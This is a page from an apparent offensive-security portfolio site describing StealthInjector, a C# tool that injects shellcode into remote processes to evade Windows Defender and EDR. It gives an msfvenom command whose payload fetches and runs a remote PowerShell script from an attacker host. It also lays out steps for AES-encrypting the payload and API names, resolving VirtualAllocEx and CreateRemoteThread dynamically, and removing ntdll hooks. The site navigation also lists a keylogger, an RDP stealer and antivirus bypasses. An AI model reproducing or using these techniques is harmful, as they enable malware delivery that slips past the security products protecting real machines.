πŸ‰
Gurpreet06
  • πŸ‘€Introduction
    • ☠️About me
    • ☎️Contact
  • πŸ‘ΎOffsensive Security
    • ⛓️OSEP
    • πŸ‰OSCP
    • ♾️OSWP
  • πŸ—³οΈHack The Box
    • β›ˆοΈCPTS
  • 🐞Zero-Point Security
    • βš”οΈCRTO
    • ⛓️CRTL
  • πŸ§™β€β™€οΈAltered Security
    • πŸ•·οΈCRTP
    • ⛓️CRTE
  • πŸ”΄Extreme Red Team Laboratories
    • πŸ“¬Active Directory Chains - MailService
    • πŸ“¬Active Directory Chains - IFIXTCENTCEN
  • πŸ’§Sektor7
    • πŸ”Red Team Operator
  • πŸ“•eLearnSecurity
    • ⛓️eCPPTv2
    • πŸ““eJPT
  • 🧊Mikrotik
    • πŸ–₯️MTCNA
  • ☒️Antivirus Bypass
    • β›ˆοΈCrowdStrike Falcon
    • β›ˆοΈBit Defender Premium Antivirus
    • β›ˆοΈSophos Intercept X Antivirus
    • β›ˆοΈSophos Home Premium Antivirus
    • β›ˆοΈKaspersky Plus Protection
    • β›ˆοΈHarmony Checkpoint Security
    • β›ˆοΈWatchGuard Advanced EPDR
    • β›ˆοΈTrend Micro Maximum Security
    • β›ˆοΈESET Security Premium Antivirus
    • β›ˆοΈMalwarebytes Premium Antivirus
    • β›ˆοΈNorton 360
    • β›ˆοΈAVIRA Prime Antivirus
    • β›ˆοΈMcAfee Total Protection
    • β›ˆοΈQuick Heal Total Protection
  • πŸ‘¨β€πŸ’»PROJECTS
    • πŸ•΅οΈInfoSniper (Bypassing Antivirus)
    • 🦈PowerSSH
    • πŸ•΅οΈPyExec
    • β˜ƒοΈPyWMI
    • πŸ“­ShareHunter
    • πŸŒ†ShadowDesk
    • πŸ›‚C2Serv
    • ⛷️StealthInjector
    • πŸ¦‚StealthInvoke
    • πŸ—οΈAMSI Patcher (Bypassing Antivirus)
    • πŸ§–β€β™‚οΈRDP-Stealer
    • πŸ“ΈTakeScreenShot
    • πŸ”‘SharpKeyLogger
    • πŸ‘ΏHellCat (EDR-Escaper)
    • 🎫ETW Patcher (Bypassing Antivirus)
    • πŸ€–PRPT (Bypassing Antivirus)
    • 🌐What Internet Knows About You (OSINT)
    • πŸ”PowerShell SSL Reverse Shell
    • πŸ“ΆWiFi - Crack
    • ⚠️ICMP Data Exfiltration
Powered by GitBook
On this page
  • Features
  • How the script works:
  • Note:
  • POC
  1. PROJECTS

StealthInjector

Process injection and Dynamic Shellcode Execution

StealthInjector.exe is an application written in C# that injects shellcode into a remote process. It bypasses Windows Defender by decrypting the payload directly in memory and by resolving and invoking functions such as VirtualAllocEx and CreateRemoteThread dynamically through System.Reflection, with their names obscured in the code, so that neither the shellcode nor the API imports are visible to static analysis.

Features

  • Remote interactive shell

  • Dynamically invoke functions such as VirtualAllocEx and CreateRemoteThread

  • Inject shellcode into a remote process

  • Basic sandbox evasion

How the script works:

  1. Payload generation: First, generate the payload with msfvenom. The command is as follows:

msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp

  Note that windows/exec with the x86/shikata_ga_nai encoder produces 32-bit shellcode, so the injector must be built for x86 and the target must be a 32-bit process; for a 64-bit target use windows/x64/exec instead. The architecture of the shellcode, the injector and the target process must all match, or the remote thread will crash the target.

  2. Payload encryption: Next, encrypt the generated payload with AES-256. This step is crucial: the ciphertext contains no recognizable shellcode bytes, so signature-based scanners such as Windows Defender have nothing to match in the binary on disk.

  3. Apply the same encryption to the strings "VirtualAllocEx" and "CreateRemoteThread", so the function names do not appear in plaintext in the code either.

  4. Dynamic invocation and decryption: Finally, resolve and invoke these functions at runtime through System.Reflection. The function names and the payload are decrypted directly in memory, immediately before use, so the plaintext shellcode never touches disk.

Note:

Advanced antivirus and EDR products may place user-mode hooks on functions such as VirtualAllocEx and CreateRemoteThread, or on the ntdll routines they call (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx). Dynamic invocation hides the import names from static analysis but does not avoid these hooks, because the hooked code still runs when the function is called. Against such products, the hooks must first be removed (for example by restoring the original ntdll code over the patched entry points), and only then is the payload loaded into memory.

POC

Process_Injection.mp4 (12 MB video demonstration)